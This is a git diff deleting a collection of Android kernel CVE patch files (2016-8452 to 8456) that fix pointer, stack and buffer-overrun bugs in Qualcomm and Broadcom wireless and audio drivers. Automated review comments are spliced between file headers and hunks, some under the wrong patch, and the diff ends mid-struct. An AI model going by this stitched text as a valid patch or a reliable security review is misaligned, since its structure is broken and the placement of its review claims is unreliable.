+++ /dev/null
@@ -1,86 +0,0 @@
-From e909d159ad1998ada853ed35be27c7b6ba241bdb Mon Sep 17 00:00:00 2001
-From: Walter Yang
-Date: Wed, 27 Jul 2016 15:07:53 +0800
-Subject: ASoC: msm: set pointers to NULL after kfree
-
-In lsm-related driver files, some pointers are not set as NULL
-after the memory is freed, which will leave many dangling pointers.
-Set them to NULL explicitly to avoid potential risk.
-
-CRs-Fixed: 880388
-Change-Id: I44925240705608510266a51225cc02611637c571
-Signed-off-by: Walter Yang
----
- sound/soc/msm/msm-cpe-lsm.c | 7 +++++++
- sound/soc/msm/qdsp6v2/msm-dai-slim.c | 2 ++
- sound/soc/msm/qdsp6v2/q6lsm.c | 1 +
- 3 files changed, 10 insertions(+)
-
-diff --git a/sound/soc/msm/msm-cpe-lsm.c b/sound/soc/msm/msm-cpe-lsm.c
-index 9f957e5..a529fcc 100644
---- a/sound/soc/msm/msm-cpe-lsm.c
-+++ b/sound/soc/msm/msm-cpe-lsm.c
-@@ -1219,6 +1219,7 @@ static int msm_cpe_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- dev_err(rtd->dev, "%s: No memory for sound model\n",
- __func__);
- kfree(session->conf_levels);
-+ session->conf_levels = NULL;
- return -ENOMEM;
- }
- session->snd_model_size = snd_model.data_size;
-@@ -1230,6 +1231,8 @@ static int msm_cpe_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- __func__);
- kfree(session->conf_levels);
- kfree(session->snd_model_data);
-+ session->conf_levels = NULL;
-+ session->snd_model_data = NULL;
- return -EFAULT;
- }
-
-@@ -1241,6 +1244,8 @@ static int msm_cpe_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- __func__, rc);
- kfree(session->snd_model_data);
- kfree(session->conf_levels);
-+ session->snd_model_data = NULL;
-+ session->conf_levels = NULL;
- return rc;
- }
-
-@@ -1254,6 +1259,8 @@ static int msm_cpe_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- lsm_ops->lsm_shmem_dealloc(cpe->core_handle, session);
- kfree(session->snd_model_data);
- kfree(session->conf_levels);
-+ session->snd_model_data = NULL;
-+ session->conf_levels = NULL;
- return rc;
- }
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-dai-slim.c b/sound/soc/msm/qdsp6v2/msm-dai-slim.c
-index b46d0a5..4bb8f59 100644
---- a/sound/soc/msm/qdsp6v2/msm-dai-slim.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dai-slim.c
-@@ -482,7 +482,9 @@ static void msm_dai_slim_remove_dai_data(
- dai_data_t = &drv_data->slim_dai_data[i];
-
- kfree(dai_data_t->chan_h);
-+ dai_data_t->chan_h = NULL;
- kfree(dai_data_t->sh_ch);
-+ dai_data_t->sh_ch = NULL;
- }
- }
-
-diff --git a/sound/soc/msm/qdsp6v2/q6lsm.c b/sound/soc/msm/qdsp6v2/q6lsm.c
-index ec73472..2bf0c49 100644
---- a/sound/soc/msm/qdsp6v2/q6lsm.c
-+++ b/sound/soc/msm/qdsp6v2/q6lsm.c
-@@ -348,6 +348,7 @@ void q6lsm_client_free(struct lsm_client *client)
- q6lsm_mmap_apr_dereg();
- mutex_destroy(&client->cmd_lock);
- kfree(client);
-+ client = NULL;
- }
-
- /*
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8452/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-8452/qcacld-2.0/0001.patch
deleted file mode 100644
index d1d433b6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8452/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,105 +0,0 @@ -From 39fa8e972fa1b10dc68a066f4f9432753d8a2526 Mon Sep 17 00:00:00 2001 -From: kaliu -Date: Thu, 4 Aug 2016 14:08:13 +0800 -Subject: qcacld-2.0: Use heap memory for station_info instead of stack - -From kernel 3.19-rc4, size of struct station_info is around 600 bytes, -so stack frame size of such routine use this struct will easily -exceed 1024 bytes, the default value of stack frame size. - -So use heap memory for this struct instead. - -Change-Id: Ibe8a4f5189fcc9d5554f7a5d851c93be8fa8dbad -CRs-Fixed: 1050323 ---- - CORE/HDD/src/wlan_hdd_assoc.c | 19 +++++++++++++------ - CORE/HDD/src/wlan_hdd_hostapd.c | 18 ++++++++++++------ - 2 files changed, 25 insertions(+), 12 deletions(-) - -diff --git a/CORE/HDD/src/wlan_hdd_assoc.c b/CORE/HDD/src/wlan_hdd_assoc.c -index 492785d..c5947c2 100644 ---- a/CORE/HDD/src/wlan_hdd_assoc.c -+++ b/CORE/HDD/src/wlan_hdd_assoc.c -@@ -2811,7 +2811,7 @@ static eHalStatus roamRoamConnectStatusUpdateHandler( hdd_adapter_t *pAdapter, t - case eCSR_ROAM_RESULT_IBSS_NEW_PEER: - { - hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter); -- struct station_info staInfo; -+ struct station_info *stainfo; - - VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, - "IBSS New Peer indication from SME with peerMac " MAC_ADDRESS_STR " BSSID: " MAC_ADDRESS_STR " and stationID= %d", -@@ -2846,13 +2846,20 @@ static eHalStatus roamRoamConnectStatusUpdateHandler( hdd_adapter_t *pAdapter, t - vosStatus, vosStatus ); - } - pHddStaCtx->ibss_sta_generation++; -- memset(&staInfo, 0, sizeof(staInfo)); -- staInfo.filled = 0; -- staInfo.generation = pHddStaCtx->ibss_sta_generation; -+ stainfo = vos_mem_malloc(sizeof(*stainfo)); -+ if (stainfo == NULL) { -+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR, -+ "memory allocation for station_info failed"); -+ return eHAL_STATUS_FAILED_ALLOC; -+ } -+ memset(stainfo, 0, sizeof(*stainfo)); -+ stainfo->filled = 0; -+ stainfo->generation = pHddStaCtx->ibss_sta_generation; - - 
cfg80211_new_sta(pAdapter->dev, -- (const u8 *)pRoamInfo->peerMac, -- &staInfo, GFP_KERNEL); -+ (const u8 *)pRoamInfo->peerMac, -+ stainfo, GFP_KERNEL); -+ vos_mem_free(stainfo); - - if ( eCSR_ENCRYPT_TYPE_WEP40_STATICKEY == pHddStaCtx->ibss_enc_key.encType - ||eCSR_ENCRYPT_TYPE_WEP104_STATICKEY == pHddStaCtx->ibss_enc_key.encType -diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c -index ba37ddc..1b7c1c7 100644 ---- a/CORE/HDD/src/wlan_hdd_hostapd.c -+++ b/CORE/HDD/src/wlan_hdd_hostapd.c -@@ -1836,15 +1836,20 @@ VOS_STATUS hdd_hostapd_SAPEventCB( tpSap_Event pSapEvent, v_PVOID_t usrDataForCa - HDD_SAP_WAKE_LOCK_DURATION, - WIFI_POWER_EVENT_WAKELOCK_SAP); - { -- struct station_info staInfo; - v_U16_t iesLen = pSapEvent->sapevt.sapStationAssocReassocCompleteEvent.iesLen; - -- memset(&staInfo, 0, sizeof(staInfo)); - if (iesLen <= MAX_ASSOC_IND_IE_LEN ) - { -- staInfo.assoc_req_ies = -+ struct station_info *stainfo; -+ stainfo = vos_mem_malloc(sizeof(*stainfo)); -+ if (stainfo == NULL) { -+ hddLog(LOGE, FL("alloc station_info failed")); -+ return VOS_STATUS_E_NOMEM; -+ } -+ memset(stainfo, 0, sizeof(*stainfo)); -+ stainfo->assoc_req_ies = - (const u8 *)&pSapEvent->sapevt.sapStationAssocReassocCompleteEvent.ies[0]; -- staInfo.assoc_req_ies_len = iesLen; -+ stainfo->assoc_req_ies_len = iesLen; - #if (LINUX_VERSION_CODE < KERNEL_VERSION(4, 0, 0)) - /* - * After Kernel 4.0, it's no longer need to set -@@ -1853,12 +1858,13 @@ VOS_STATUS hdd_hostapd_SAPEventCB( tpSap_Event pSapEvent, v_PVOID_t usrDataForCa - * check the existance of request IE. 
- */ - #if (LINUX_VERSION_CODE >= KERNEL_VERSION(3,0,31)) || defined(WITH_BACKPORTS) -- staInfo.filled |= STATION_INFO_ASSOC_REQ_IES; -+ stainfo->filled |= STATION_INFO_ASSOC_REQ_IES; - #endif - #endif - cfg80211_new_sta(dev, - (const u8 *)&pSapEvent->sapevt.sapStationAssocReassocCompleteEvent.staMac.bytes[0], -- &staInfo, GFP_KERNEL); -+ stainfo, GFP_KERNEL); -+ vos_mem_free(stainfo); - } - else - { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-8453/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8453/ANY/0001.patch deleted file mode 100644 index ac740441..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8453/ANY/0001.patch +++ /dev/null @@ -1,30 +0,0 @@ -From f10f4e420dddc35dfef53965c55ffd5bdec41a45 Mon Sep 17 00:00:00 2001 -From: Insun Song -Date: Mon, 12 Oct 2015 23:31:12 -0700 -Subject: [PATCH] net: wireless: bcmdhd: remove unnecessary PCIe memory access - when BUS down. - -In case PCIe BUS already down, we're not supposed to do access BAR0 -area in any reason. One instance seen on test that made kernel panic. -removed disable irq calling which is useless in bus down case. - -bug=24739315 - -Change-Id: I474e08c14c4dec0f4cc4cd207f29fef32e85ead7 -Signed-off-by: Insun Song ---- - drivers/net/wireless/bcmdhd/dhd_pcie.c | 1 - - 1 file changed, 1 deletion(-) - -diff --git a/drivers/net/wireless/bcmdhd/dhd_pcie.c b/drivers/net/wireless/bcmdhd/dhd_pcie.c -index 21bbe54ee1889..1adffc366c679 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_pcie.c -+++ b/drivers/net/wireless/bcmdhd/dhd_pcie.c -@@ -2472,7 +2472,6 @@ dhd_bus_devreset(dhd_pub_t *dhdp, uint8 flag) - bus->dhd->busstate = DHD_BUS_DOWN; - } else { - if (bus->intr) { -- dhdpcie_bus_intr_disable(bus); - dhdpcie_free_irq(bus); - } - diff --git a/Patches/Linux_CVEs/CVE-2016-8454/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8454/ANY/0001.patch deleted file mode 100644 index 4c7d61df..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8454/ANY/0001.patch +++ /dev/null 
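Review bot: In wlan_hdd_assoc.c the new `return eHAL_STATUS_FAILED_ALLOC;` leaves the IBSS new-peer case after `pHddStaCtx->ibss_sta_generation++` has already run and before the WEP static-key block that follows `cfg80211_new_sta()` in the context lines, so an allocation failure now skips more than the notification. If that key setup is still required for the peer (the rest of the case is outside the hunk, so this is inferred), log the failure and skip only the `cfg80211_new_sta()` call instead of returning. `stainfo->filled = 0;` directly after the `memset()` is redundant. A short comment such as `/* heap, not stack: struct station_info is ~600 bytes */` at both allocations would keep the reason for the change next to the code.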
@@ -1,264 +0,0 @@ -From 39bd1fc23040a441628884588b19bc4d199b59c2 Mon Sep 17 00:00:00 2001 -From: Insun Song -Date: Tue, 8 Nov 2016 11:19:43 -0800 -Subject: [PATCH] net: wireless: bcmdhd: fix overrun in dhd_pno_set_cfg_gscan - -1. added limit check for GSCAN-PNO max channel bucket -2. added length check in each NL TLV parsing and error handling - -Bug: 32174590 - -Signed-off-by: Insun Song -Change-Id: Ic946bfa3b3ab6b2b201043371c27ee7dbedb7e75 ---- - drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 210 +++++++++++++++++++---------- - 1 file changed, 142 insertions(+), 68 deletions(-) - -diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -index 3239bf53a5f1d..b536de31010a9 100644 ---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -@@ -510,23 +510,113 @@ static int wl_cfgvendor_enable_full_scan_result(struct wiphy *wiphy, - return err; - } - --static int wl_cfgvendor_set_scan_cfg(struct wiphy *wiphy, -- struct wireless_dev *wdev, const void *data, int len) -+static int -+wl_cfgvendor_set_scan_cfg_bucket(const struct nlattr *prev, -+ gscan_scan_params_t *scan_param, int num) -+{ -+ struct dhd_pno_gscan_channel_bucket *ch_bucket; -+ int k = 0; -+ int type, err = 0, rem; -+ const struct nlattr *cur, *next; -+ -+ nla_for_each_nested(cur, prev, rem) { -+ type = nla_type(cur); -+ ch_bucket = scan_param->channel_bucket; -+ switch (type) { -+ case GSCAN_ATTRIBUTE_BUCKET_ID: -+ break; -+ case GSCAN_ATTRIBUTE_BUCKET_PERIOD: -+ if (nla_len(cur) != sizeof(uint32)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ -+ ch_bucket[num].bucket_freq_multiple = -+ nla_get_u32(cur) / MSEC_PER_SEC; -+ break; -+ case GSCAN_ATTRIBUTE_BUCKET_NUM_CHANNELS: -+ if (nla_len(cur) != sizeof(uint32)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ ch_bucket[num].num_channels = nla_get_u32(cur); -+ if (ch_bucket[num].num_channels > -+ GSCAN_MAX_CHANNELS_IN_BUCKET) { -+ WL_ERR(("channel range:%d,bucket:%d\n", -+ 
ch_bucket[num].num_channels, -+ num)); -+ err = -EINVAL; -+ goto exit; -+ } -+ break; -+ case GSCAN_ATTRIBUTE_BUCKET_CHANNELS: -+ nla_for_each_nested(next, cur, rem) { -+ if (k >= GSCAN_MAX_CHANNELS_IN_BUCKET) -+ break; -+ if (nla_len(next) != sizeof(uint32)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ ch_bucket[num].chan_list[k] = nla_get_u32(next); -+ k++; -+ } -+ break; -+ case GSCAN_ATTRIBUTE_BUCKETS_BAND: -+ if (nla_len(cur) != sizeof(uint32)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ ch_bucket[num].band = (uint16)nla_get_u32(cur); -+ break; -+ case GSCAN_ATTRIBUTE_REPORT_EVENTS: -+ if (nla_len(cur) != sizeof(uint32)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ ch_bucket[num].report_flag = (uint8)nla_get_u32(cur); -+ break; -+ case GSCAN_ATTRIBUTE_BUCKET_STEP_COUNT: -+ if (nla_len(cur) != sizeof(uint32)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ ch_bucket[num].repeat = (uint16)nla_get_u32(cur); -+ break; -+ case GSCAN_ATTRIBUTE_BUCKET_MAX_PERIOD: -+ if (nla_len(cur) != sizeof(uint32)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ ch_bucket[num].bucket_max_multiple = -+ nla_get_u32(cur) / MSEC_PER_SEC; -+ break; -+ default: -+ WL_ERR(("unknown attr type:%d\n", type)); -+ err = -EINVAL; -+ goto exit; -+ } -+ } -+ -+exit: -+ return err; -+} -+ -+static int -+wl_cfgvendor_set_scan_cfg(struct wiphy *wiphy, struct wireless_dev *wdev, -+ const void *data, int len) - { - int err = 0; - struct bcm_cfg80211 *cfg = wiphy_priv(wiphy); - gscan_scan_params_t *scan_param; - int j = 0; -- int type, tmp, tmp1, tmp2, k = 0; -- const struct nlattr *iter, *iter1, *iter2; -- struct dhd_pno_gscan_channel_bucket *ch_bucket; -+ int type, tmp; -+ const struct nlattr *iter; - - scan_param = kzalloc(sizeof(gscan_scan_params_t), GFP_KERNEL); - if (!scan_param) { - WL_ERR(("Could not set GSCAN scan cfg, mem alloc failure\n")); - err = -EINVAL; - return err; -- - } - - scan_param->scan_fr = PNO_SCAN_MIN_FW_SEC; -@@ -537,77 +627,61 @@ static int wl_cfgvendor_set_scan_cfg(struct wiphy *wiphy, - 
break; - - switch (type) { -- case GSCAN_ATTRIBUTE_BASE_PERIOD: -- scan_param->scan_fr = nla_get_u32(iter)/1000; -- break; -- case GSCAN_ATTRIBUTE_NUM_BUCKETS: -- scan_param->nchannel_buckets = nla_get_u32(iter); -- break; -- case GSCAN_ATTRIBUTE_CH_BUCKET_1: -- case GSCAN_ATTRIBUTE_CH_BUCKET_2: -- case GSCAN_ATTRIBUTE_CH_BUCKET_3: -- case GSCAN_ATTRIBUTE_CH_BUCKET_4: -- case GSCAN_ATTRIBUTE_CH_BUCKET_5: -- case GSCAN_ATTRIBUTE_CH_BUCKET_6: -- case GSCAN_ATTRIBUTE_CH_BUCKET_7: -- nla_for_each_nested(iter1, iter, tmp1) { -- type = nla_type(iter1); -- ch_bucket = -- scan_param->channel_bucket; -+ case GSCAN_ATTRIBUTE_BASE_PERIOD: -+ if (nla_len(iter) != sizeof(uint32)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ scan_param->scan_fr = nla_get_u32(iter) / MSEC_PER_SEC; -+ break; -+ case GSCAN_ATTRIBUTE_NUM_BUCKETS: -+ if (nla_len(iter) != sizeof(uint32)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ scan_param->nchannel_buckets = nla_get_u32(iter); -+ if (scan_param->nchannel_buckets >= -+ GSCAN_MAX_CH_BUCKETS) { -+ WL_ERR(("ncha_buck out of range %d\n", -+ scan_param->nchannel_buckets)); -+ err = -EINVAL; -+ goto exit; -+ } -+ break; -+ case GSCAN_ATTRIBUTE_CH_BUCKET_1: -+ case GSCAN_ATTRIBUTE_CH_BUCKET_2: -+ case GSCAN_ATTRIBUTE_CH_BUCKET_3: -+ case GSCAN_ATTRIBUTE_CH_BUCKET_4: -+ case GSCAN_ATTRIBUTE_CH_BUCKET_5: -+ case GSCAN_ATTRIBUTE_CH_BUCKET_6: -+ case GSCAN_ATTRIBUTE_CH_BUCKET_7: -+ err = wl_cfgvendor_set_scan_cfg_bucket(iter, -+ scan_param, j); -+ if (err < 0) { -+ WL_ERR(("set_scan_cfg_buck error:%d\n", err)); -+ goto exit; -+ } - -- switch (type) { -- case GSCAN_ATTRIBUTE_BUCKET_ID: -- break; -- case GSCAN_ATTRIBUTE_BUCKET_PERIOD: -- ch_bucket[j].bucket_freq_multiple = -- nla_get_u32(iter1)/1000; -- break; -- case GSCAN_ATTRIBUTE_BUCKET_NUM_CHANNELS: -- ch_bucket[j].num_channels = -- nla_get_u32(iter1); -- break; -- case GSCAN_ATTRIBUTE_BUCKET_CHANNELS: -- nla_for_each_nested(iter2, iter1, tmp2) { -- if (k >= GSCAN_MAX_CHANNELS_IN_BUCKET) -- break; -- 
ch_bucket[j].chan_list[k] = -- nla_get_u32(iter2); -- k++; -- } -- k = 0; -- break; -- case GSCAN_ATTRIBUTE_BUCKETS_BAND: -- ch_bucket[j].band = (uint16) -- nla_get_u32(iter1); -- break; -- case GSCAN_ATTRIBUTE_REPORT_EVENTS: -- ch_bucket[j].report_flag = (uint8) -- nla_get_u32(iter1); -- break; -- case GSCAN_ATTRIBUTE_BUCKET_STEP_COUNT: -- ch_bucket[j].repeat = (uint16) -- nla_get_u32(iter1); -- break; -- case GSCAN_ATTRIBUTE_BUCKET_MAX_PERIOD: -- ch_bucket[j].bucket_max_multiple = -- nla_get_u32(iter1)/1000; -- break; -- } -- } -- j++; -- break; -+ j++; -+ break; -+ default: -+ WL_ERR(("Unknown attr type %d\n", type)); -+ err = -EINVAL; -+ goto exit; - } - } - -- if (dhd_dev_pno_set_cfg_gscan(bcmcfg_to_prmry_ndev(cfg), -- DHD_PNO_SCAN_CFG_ID, scan_param, FALSE) < 0) { -- WL_ERR(("Could not set GSCAN scan cfg\n")); -+ err = dhd_dev_pno_set_cfg_gscan(bcmcfg_to_prmry_ndev(cfg), -+ DHD_PNO_SCAN_CFG_ID, scan_param, FALSE); -+ -+ if (err < 0) { -+ WL_ERR(("Could not set GSCAN scan cfg error %d\n", err)); - err = -EINVAL; - } - -+exit: - kfree(scan_param); - return err; -- - } - - static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy, diff --git a/Patches/Linux_CVEs/CVE-2016-8455/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8455/ANY/0001.patch deleted file mode 100644 index e02cc460..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8455/ANY/0001.patch +++ /dev/null 
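Review bot: The bucket index is still unbounded: `j` in `wl_cfgvendor_set_scan_cfg()` is incremented for every `GSCAN_ATTRIBUTE_CH_BUCKET_n` attribute and passed as `num` to `wl_cfgvendor_set_scan_cfg_bucket()`, which writes `ch_bucket[num]` without comparing it with any limit; only `nchannel_buckets` is range-checked. Assuming `channel_bucket[]` holds `GSCAN_MAX_CH_BUCKETS` entries (its declaration is not part of the patch), add `if (j >= GSCAN_MAX_CH_BUCKETS) { err = -EINVAL; goto exit; }` before the helper call. In the helper, the inner `nla_for_each_nested(next, cur, rem)` reuses the outer loop's `rem`, so parsing `GSCAN_ATTRIBUTE_BUCKET_CHANNELS` overwrites the outer remaining-length counter; give the inner loop its own variable, e.g. `int rem_ch;`.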
@@ -1,120 +0,0 @@ -From 068427b76963929b220a4be40cdf77856374df55 Mon Sep 17 00:00:00 2001 -From: Sudhir Kohalli -Date: Fri, 4 Nov 2016 12:09:19 -0700 -Subject: [PATCH] net: wireless: bcmdhd: Security V: memory overflow in wifi - driver function __dhd_apf_add_filter - -In order to fix the memory overflow added a check -for APF program_len to verify if the program_len is -more than the MAX program length. If the APF program_len -is more than the MAX APF program_len then parse an error. -This check will avoid memory oveflow issue happening -in __dhd_apf_add_filter API. APF referes to Android Packet -filter. - -Bug: 32219121 - -Change-Id: Ibe468dcb51ec4f35c64da4bdc7296130bf145f13 -Signed-off-by: Sudhir Kohalli ---- - drivers/net/wireless/bcmdhd/dhd_linux.c | 13 ++++++++++- - drivers/net/wireless/bcmdhd/include/wlioctl.h | 2 ++ - drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 31 +++++++++++++++++++++++++-- - 3 files changed, 43 insertions(+), 3 deletions(-) - -diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c -index 4ce5a2f4663d3..2fd2934a7e851 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_linux.c -+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c -@@ -9039,13 +9039,24 @@ __dhd_apf_add_filter(struct net_device *ndev, uint32 filter_id, - } - - cmd_len = sizeof(cmd); -+ -+ /* Check if the program_len is more than the expected len -+ * and if program is initialized to NULL return here. -+ */ -+ if ((program_len > WL_APF_PROGRAM_MAX_SIZE) || -+ (program == NULL)) { -+ DHD_ERROR(("%s Invalid program_len: %d, program: %pK\n", -+ __func__, program_len, program)); -+ return -EINVAL; -+ } - buf_len = cmd_len + WL_PKT_FILTER_FIXED_LEN + - WL_APF_PROGRAM_FIXED_LEN + program_len; - - kflags = in_atomic() ? 
GFP_ATOMIC : GFP_KERNEL; - buf = kzalloc(buf_len, kflags); - if (unlikely(!buf)) { -- DHD_ERROR(("%s: MALLOC failure, %d bytes\n", __FUNCTION__, buf_len)); -+ DHD_ERROR(("%s: MALLOC failure, %d bytes\n", __func__, -+ buf_len)); - return -ENOMEM; - } - -diff --git a/drivers/net/wireless/bcmdhd/include/wlioctl.h b/drivers/net/wireless/bcmdhd/include/wlioctl.h -index 50de89bc5a9c6..808a0bfc3e108 100644 ---- a/drivers/net/wireless/bcmdhd/include/wlioctl.h -+++ b/drivers/net/wireless/bcmdhd/include/wlioctl.h -@@ -3291,6 +3291,8 @@ typedef struct wl_tcp_keep_set { - OFFSETOF(wl_pkt_filter_pattern_listel_t, mask_and_data) - - #define WL_APF_INTERNAL_VERSION 1 -+/* This will be MAX allowable APF program size */ -+#define WL_APF_PROGRAM_MAX_SIZE (2 * 1024) - #define WL_APF_PROGRAM_FIXED_LEN OFFSETOF(wl_apf_program_t, instrs) - #define WL_APF_PROGRAM_LEN(apf_program) \ - (apf_program->instr_len * sizeof(apf_program->instrs[0])) -diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -index d578026885619..5be16a72aa43f 100644 ---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -@@ -2722,12 +2722,33 @@ wl_cfgvendor_apf_set_filter(struct wiphy *wiphy, - int ret, tmp, type; - gfp_t kflags; - -- /* assumption: length attribute must come first */ -+ if (len <= 0) { -+ WL_ERR((" Invalid len : %d\n", len)); -+ ret = -EINVAL; -+ goto exit; -+ } - nla_for_each_attr(iter, data, len, tmp) { - type = nla_type(iter); - switch (type) { - case APF_ATTRIBUTE_PROGRAM_LEN: -- program_len = nla_get_u32(iter); -+ /* check if the iter is valid and program -+ * length is not already initialized. 
-+ */ -+ if (nla_len(iter) == sizeof(uint32) && -+ !program_len) { -+ program_len = nla_get_u32(iter); -+ } else { -+ ret = -EINVAL; -+ goto exit; -+ } -+ -+ if (program_len > -+ WL_APF_PROGRAM_MAX_SIZE) { -+ WL_ERR(("program len is more ")); -+ WL_ERR(("than expected len\n")); -+ ret = -EINVAL; -+ goto exit; -+ } - if (unlikely(!program_len)) { - WL_ERR(("zero program length\n")); - ret = -EINVAL; -@@ -2740,6 +2761,12 @@ wl_cfgvendor_apf_set_filter(struct wiphy *wiphy, - ret = -EINVAL; - goto exit; - } -+ if (nla_len(iter) != program_len) { -+ WL_ERR(("program_len is not same\n")); -+ ret = -EINVAL; -+ goto exit; -+ } -+ - kflags = in_atomic() ? GFP_ATOMIC : GFP_KERNEL; - program = kzalloc(program_len, kflags); - if (unlikely(!program)) { diff --git a/Patches/Linux_CVEs/CVE-2016-8456/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8456/ANY/0001.patch deleted file mode 100644 index 57a46338..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8456/ANY/0001.patch +++ /dev/null 
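Review bot: The `APF_ATTRIBUTE_PROGRAM` case in `wl_cfgvendor_apf_set_filter()` has no guard against the attribute being seen twice: the length case now rejects a second value through `!program_len`, but `program = kzalloc(program_len, kflags);` would overwrite an earlier allocation and leak it, unless a check outside the hunk prevents that. Assuming `program` starts out NULL, adding `if (program) { ret = -EINVAL; goto exit; }` before the allocation makes the two cases symmetric. The over-length message is split across two `WL_ERR` calls and can be interleaved with other log output; a single `WL_ERR(("program len %d exceeds max\n", program_len));` is clearer. The function body starts and ends outside the hunk.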
@@ -1,348 +0,0 @@ -From e5c1b001a822e8b38680655c400e7b3f67cc3323 Mon Sep 17 00:00:00 2001 -From: Insun Song -Date: Thu, 10 Nov 2016 15:01:31 -0800 -Subject: [PATCH] net: wireless: bcmdhd: fix buffer overrun in anqpo config - -1. memory leak fix when input packet content corrupted. -2. reduced unnecessary debug messages - -Signed-off-by: Insun Song -Bug: 32219453 -Change-Id: I0f79310c97571cd46afff29f58f66b17a2471927 ---- - drivers/net/wireless/bcmdhd/dhd_linux.c | 2 + - drivers/net/wireless/bcmdhd/dhd_pno.c | 3 +- - drivers/net/wireless/bcmdhd/dhd_pno.h | 17 ++-- - drivers/net/wireless/bcmdhd/wl_cfg80211.c | 14 +++ - drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 141 ++++++++++++++++++++--------- - 5 files changed, 127 insertions(+), 50 deletions(-) - -diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c -index 2fd2934a7e851..00201de5de5b8 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_linux.c -+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c -@@ -8621,6 +8621,7 @@ int dhd_dev_set_whitelist_ssid(struct net_device *dev, wl_ssid_whitelist_t *ssid - return err; - } - -+#ifdef DHD_ANQPO_SUPPORT - void * dhd_dev_process_anqpo_result(struct net_device *dev, - const void *data, uint32 event, int *send_evt_bytes) - { -@@ -8628,6 +8629,7 @@ void * dhd_dev_process_anqpo_result(struct net_device *dev, - - return (dhd_pno_process_anqpo_result(&dhd->pub, data, event, send_evt_bytes)); - } -+#endif /* DHD_ANQPO_SUPPORT */ - #endif /* GSCAN_SUPPORT */ - - int dhd_dev_set_rssi_monitor_cfg(struct net_device *dev, int start, -diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c -index 8d6d234cd11b3..a88d1e2e41320 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_pno.c -+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c -@@ -3798,6 +3798,7 @@ dhd_pno_process_epno_result(dhd_pub_t *dhd, const void *data, uint32 event, int - return results; - } - -+#ifdef DHD_ANQPO_SUPPORT - void * - dhd_pno_process_anqpo_result(dhd_pub_t 
*dhd, const void *data, uint32 event, int *size) - { -@@ -3849,7 +3850,7 @@ dhd_pno_process_anqpo_result(dhd_pub_t *dhd, const void *data, uint32 event, int - - return result; - } -- -+#endif /* DHD_ANQPO_SUPPORT */ - - void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_bytes, - hotlist_type_t type) -diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.h b/drivers/net/wireless/bcmdhd/dhd_pno.h -index b61d0fd866364..a0edf54049acf 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_pno.h -+++ b/drivers/net/wireless/bcmdhd/dhd_pno.h -@@ -98,8 +98,9 @@ - - #define CHANNEL_BUCKET_EMPTY_INDEX 0xFFFF - #define GSCAN_RETRY_THRESHOLD 3 --#define MAX_EPNO_SSID_NUM 64 -- -+#define MAX_EPNO_SSID_NUM 64 -+#define GSCAN_ANQPO_MAX_HS_LIST_SIZE 16 -+#define ANQPO_MAX_HS_NAI_REALM_SIZE 256 - #endif /* GSCAN_SUPPORT */ - - enum scan_status { -@@ -351,10 +352,10 @@ typedef struct gscan_results_cache { - } gscan_results_cache_t; - - typedef struct { -- int id; /* identifier of this network block, report this in event */ -- char realm[256]; /* null terminated UTF8 encoded realm, 0 if unspecified */ -- int64_t roamingConsortiumIds[16]; /* roaming consortium ids to match, 0s if unspecified */ -- uint8 plmn[3]; /* 